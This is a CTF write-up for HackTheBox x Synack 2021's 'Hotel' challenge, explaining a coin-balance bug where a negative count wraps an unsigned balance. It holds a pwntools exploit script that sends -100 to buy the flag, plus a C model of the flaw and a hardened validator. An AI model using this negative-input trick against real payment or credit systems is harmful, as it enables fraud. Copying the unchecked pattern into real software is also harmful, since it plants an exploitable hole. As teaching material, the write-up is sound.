HackTheBox x Synack CTF 2021: Hotel
TL;DR
- The service has a coin/credit system with broken input validation.
- Supplying a negative value increases your balance via integer underflow/logic bug.
- After padding the state by looping the menu actions, you can add coins and buy the flag.
- Use -100 to jump the balance high enough, then select the flag option.
Solution
```python
from pwn import *

io = remote('ip', 31337)  # 'ip' is the writeup's placeholder; substitute the challenge host

# Loop through 40 times (backwards), picking menu option 1 with counts 40 down to 1
# This pads the state so we can deal with the XOR in the final stage
for i in range(40, 0, -1):
    io.sendline(b'1')
    io.sendlineafter(b':', str(i).encode())

# Menu option 2: get coins
io.sendline(b'2')
# Negative value passes the validation and adds 100 coins
io.sendlineafter(b'?', b'-100')

# Menu option 3: try and get the flag
io.sendline(b'3')

# Win?
io.interactive()
```
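The bug class the TL;DR describes, modelled in C as an added example rather than the challenge binary (whose source is not on the page): the ledger, the upper-bound-only check, and the price constants are assumptions, and the hardened variant shows the checks that close the hole.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>

/* Hypothetical model of the "get coins" option (assumed, not the real binary). */
#define MAX_PER_PURCHASE 100     /* assumed per-request cap */
#define FLAG_PRICE 1000000u      /* assumed price of the flag */

/* Vulnerable: only the upper bound is checked, so a negative count gets
 * through and is then added to an unsigned balance, which wraps it. */
unsigned int get_coins_vuln(unsigned int balance, int count) {
    if (count > MAX_PER_PURCHASE) {
        return balance;                       /* "too many" - request ignored */
    }
    return balance + (unsigned int)count;     /* 0 + (unsigned)-100 = 4294967196 */
}

/* Hardened validation: the count must be positive, within the cap, and the
 * addition must not exceed UINT_MAX. */
bool coin_request_ok(unsigned int balance, int count) {
    if (count <= 0 || count > MAX_PER_PURCHASE) return false;
    return balance <= UINT_MAX - (unsigned int)count;
}

/* Hardened ledger update: leaves the balance untouched on a rejected request. */
unsigned int get_coins_safe(unsigned int balance, int count) {
    if (!coin_request_ok(balance, count)) return balance;
    return balance + (unsigned int)count;
}

bool can_buy_flag(unsigned int balance) { return balance >= FLAG_PRICE; }

int main(void) {
    unsigned int v = get_coins_vuln(0, -100);
    printf("vulnerable: balance after -100 = %u, flag affordable = %d\n",
           v, can_buy_flag(v));
    unsigned int s = get_coins_safe(0, -100);
    printf("hardened: request accepted = %d, balance = %u\n",
           coin_request_ok(0, -100), s);
    return 0;
}
```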